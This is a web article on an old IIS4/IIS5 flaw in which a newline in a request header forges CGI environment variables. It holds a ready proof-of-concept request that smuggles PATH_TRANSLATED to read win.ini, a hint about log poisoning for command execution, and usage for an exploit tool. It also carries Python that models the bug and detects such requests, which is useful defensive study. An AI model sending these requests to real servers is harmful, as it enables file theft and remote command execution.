IIS4 \ IIS5 CGI Environment block forgery 0 day

Source: Internet
Author: User

It turns out this 0-day dates back around 14 years.


It is an IIS4 / IIS5 vulnerability; the corresponding operating systems are Windows NT and Windows 2000. Microsoft no longer supports this software, and its strategy is to retire these systems. After the vulnerability had been reported for 11 years, Microsoft decided not to fix it. It is a very serious vulnerability; the affected software now has relatively low usage, but the total number of deployments is still quite large.


Environment block forgery vulnerability when IIS loads a CGI


When IIS4 and IIS5 load a CGI program and build its environment block, they incorrectly replace the "\n" character with "\x00", which makes it possible to forge any environment block entry. When IIS loads a CGI, it adds the "HTTP_" prefix to the request headers it passes as environment variables, to distinguish them from local environment variables; because "\n" is rewritten to "\0", the entry is cut in two and the second half loses this prefix, so arbitrary environment block variables can be forged. An attacker can submit "a=B\nPATH_TRANSLATED: var" in the HTTP headers to execute arbitrary commands.

CGI is used in two ways. One is a program compiled into an .exe; common examples include counters, applications developed by individual websites, and widely deployed web applications. The other is a script mapped to an .exe interpreter for execution (ISAPI is mapped to a .dll and is not affected); common examples include PHP and Perl scripts.


The concrete impact depends on how the CGI program handles its environment block; possible outcomes include:

1. A buffer overflow when the CGI processes local environment variables. Some CGIs treat local environment variables as trusted, since they normally cannot be set from outside, and do not check the buffer size.

2. Some environment block variables affect the processing logic and trust relationships of certain CGI programs.

3. When loading a DLL or a process, the attacker's program is loaded because of a forged path environment variable.

Reproduction steps:

1. win2000 + IIS5, with .php mapped to php.exe (that is, CGI mode; if .php is mapped to a .dll in ISAPI mode, this vulnerability does not exist)

2. Send the request:

"GET /.php HTTP/1.1\r\na=B\nPATH_TRANSLATED: c:\windows\win.ini\r\nHOST: 192.168.0.1\r\n"

3. IIS returns the contents of win.ini.

You can also write PHP code into an IIS log file and have php.exe run that log file to execute system commands.
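To make the mechanism above concrete, and to give a defender something to test against, here is an added Python model; it is not code from the original post or from the iisexp411 tool. It assumes the CGI convention of mapping a request header to HTTP_<NAME>=<value> (upper-cased, hyphens turned into underscores), reproduces the "\n"-to-"\0" rewrite the text describes, and places a hardened builder beside it that rejects header names outside the RFC 7230 token set and values carrying control bytes. The two sample requests are constructed: one is the request quoted in the reproduction steps, the other a benign control. The short list of CGI meta-variable names used by the inspection routine is taken from RFC 3875.

```python
import re

# Constructed sample requests. MALFORMED_REQUEST is the request quoted in the
# article: a bare LF inside a header *name* smuggles a second, unprefixed entry.
MALFORMED_REQUEST = (
    b"GET /.php HTTP/1.1\r\n"
    b"a=B\nPATH_TRANSLATED: c:\\windows\\win.ini\r\n"
    b"HOST: 192.168.0.1\r\n\r\n"
)
BENIGN_REQUEST = (
    b"GET /index.php HTTP/1.1\r\n"
    b"Host: 192.168.0.1\r\n"
    b"User-Agent: probe/1.0\r\n\r\n"
)

# RFC 7230 "tchar": the only bytes allowed in a header name (assumption for the
# hardened builder; the article only says IIS did no such check).
TOKEN_RE = re.compile(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+")
# A few RFC 3875 CGI meta-variable names that never belong in a request header.
CGI_META = {b"PATH_TRANSLATED", b"PATH_INFO", b"SCRIPT_NAME", b"REMOTE_USER", b"AUTH_TYPE"}


def parse_headers(raw: bytes):
    """Split a raw request into (name, value) pairs the way a naive server does:
    a line ends at CRLF and the name is everything before the first ':'.  A bare
    LF is NOT a line terminator here, so it survives inside the header name."""
    head = raw.partition(b"\r\n\r\n")[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name, value.strip()))
    return headers


def _cgi_name(name: bytes) -> bytes:
    # CGI convention: upper-case the header name and turn '-' into '_'
    return b"HTTP_" + name.upper().replace(b"-", b"_")


def build_env_block_vulnerable(headers):
    """Model of the behaviour the article describes: each header becomes
    HTTP_<NAME>=<value>, then every LF is rewritten to NUL.  Because a CGI
    environment block is a run of NUL-terminated strings, that NUL splits one
    header into two entries, and the second entry carries no HTTP_ prefix."""
    entries = [(_cgi_name(n) + b"=" + v).replace(b"\n", b"\x00") for n, v in headers]
    return b"\x00".join(entries) + b"\x00\x00"


def build_env_block_hardened(headers):
    """Same mapping, but a header name must be a token and a value may not carry
    CR, LF or NUL; anything else is rejected before it can reach the block."""
    entries = []
    for name, value in headers:
        if not TOKEN_RE.fullmatch(name):
            raise ValueError(f"illegal header name: {name!r}")
        if re.search(rb"[\r\n\x00]", value):
            raise ValueError(f"control byte in value of {name!r}")
        entries.append(_cgi_name(name) + b"=" + value)
    return b"\x00".join(entries) + b"\x00\x00"


def env_entries(block: bytes):
    """Decode a NUL-separated environment block the way the CGI child sees it."""
    return [e.decode("latin-1") for e in block.split(b"\x00") if e]


def hardened_rejects(raw: bytes) -> bool:
    """True if the hardened builder refuses the request outright."""
    try:
        build_env_block_hardened(parse_headers(raw))
    except ValueError:
        return True
    return False


def inspect_request(raw: bytes):
    """Defender-side check (WAF rule / log triage): list the reasons a raw
    request should be flagged.  An empty list means nothing suspicious."""
    findings = []
    for name, value in parse_headers(raw):
        if b"\n" in name or b"\n" in value:
            findings.append("bare LF inside a header line (NUL-split / env forgery)")
        for piece in name.split(b"\n"):
            if piece.strip().upper() in CGI_META:
                findings.append("CGI meta-variable name in header: "
                                + piece.strip().decode("latin-1"))
        if not TOKEN_RE.fullmatch(name):
            findings.append(f"header name is not an RFC 7230 token: {name!r}")
    return findings


if __name__ == "__main__":
    block = build_env_block_vulnerable(parse_headers(MALFORMED_REQUEST))
    print("vulnerable builder produced:", env_entries(block))
    print("hardened builder rejects it:", hardened_rejects(MALFORMED_REQUEST))
    print("findings:", inspect_request(MALFORMED_REQUEST))
    print("benign findings:", inspect_request(BENIGN_REQUEST))
```

Run as a script, the vulnerable builder turns two headers into three environment entries, the unprefixed PATH_TRANSLATED among them, while the hardened builder refuses the request before any block is built. inspect_request() is the shape of rule a reverse proxy or log parser in front of a legacy IIS host can apply: the decisive signal is a bare LF inside a header line, which no legitimate client sends.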

 


 

usage: 
 

 

iisexp411 127.0.0.1  /AprilFools'Day.php  PATH_TRANSLATED  c:\windows\win.ini

 
